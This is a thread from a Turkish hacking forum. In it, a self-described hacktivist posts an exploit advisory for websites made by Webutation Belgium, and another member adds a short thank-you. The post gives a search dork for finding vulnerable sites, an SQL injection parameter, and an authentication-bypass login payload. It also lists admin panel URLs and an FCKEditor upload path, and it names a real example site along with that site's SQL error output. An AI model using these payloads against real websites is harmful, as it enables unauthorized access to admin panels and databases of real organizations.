Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Webutation Belgium 2018 Multiple Vulnerabilities
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 56
Yaşam Puanı: 1,379 / 1,379
Deneyim: 18 / 100
Rep Sayısı: 2806
Mesaj Sayısı: 6415
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
Webutation Belgium 2018 Multiple Vulnerabilities
18.09.2018 01:21
################################################################################​#################

# Exploit Title : Copyright © 2011 - 2018 Webutation Belgium Multiple Vulnerabilities
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 18/09/2018
# Vendor Homepage : webutation.net ~ webutation.org
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-592 - [ Authentication Bypass Issues ]
+ CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

################################################################################​#################

# Google Dork :

intext:Copyright © 2011 - 2018 Webutation site:be

© Webutation 2018

# SQL Injection Exploit =>

/activiteit.php?id=[SQL Inj]

# Admin Panel Login Path =>

/admin/login.php

# Admin Login Bypass Exploit :

Username : '=''or'

Password : '=''or'

# Useable Admin Panel Control URL Links =>

/admin/ingelogged.php
/admin/activiteiten.php
/admin/info.php
/admin/medewerkers.php
/admin/leden.php
/admin/gastenboek.php
/admin/verslagen.php

# FCKEditor Filemanager Exploit =>

TARGET/fckeditor/editor/filemanager/connectors/uploadtest.html

TARGET/yourfilenamehere.txt

################################################################################​#################

# Example Site => tgeverke.be => [ Proof of Concept for Authentication Bypass ] => archive.is/OQ8GQ

# Example Site for SQL Inj => tgeverke.be/activiteit.php?id=465%27

# SQL Database Error =>

FOUT1: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''465''' at line 1

################################################################################​#################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

################################################################################​#################
(Bu konu en son: 18.09.2018 Tarihinde, Saat: 09:31 düzenlenmiştir. Düzenleyen: KingSkrupellos.)

# KingSkrupellos # Cyberizm Digital Security Technological Turkish Moslem Army #



Alinti
The_ZiziL
*
avatar
Valhalla
Durum: Çevrimdışı
Seviye Puanı: 36
Yaşam Puanı: 890 / 890
Deneyim: 61 / 100
Rep Sayısı: 570
Mesaj Sayısı: 1950
Üyelik Tarihi: 06.02.2017
     
Yorum: #2
RE : Webutation Belgium 2018 Multiple Vulnerabilities
18.09.2018 08:26
Teşekkürler, Emeğine Sağlık.
(Bu konu en son: 18.09.2018 Tarihinde, Saat: 09:32 düzenlenmiştir. Düzenleyen: KingSkrupellos.)

Allah’tan utanmayan insanlardan da utanmaz…
Alinti



1 Ziyaretçi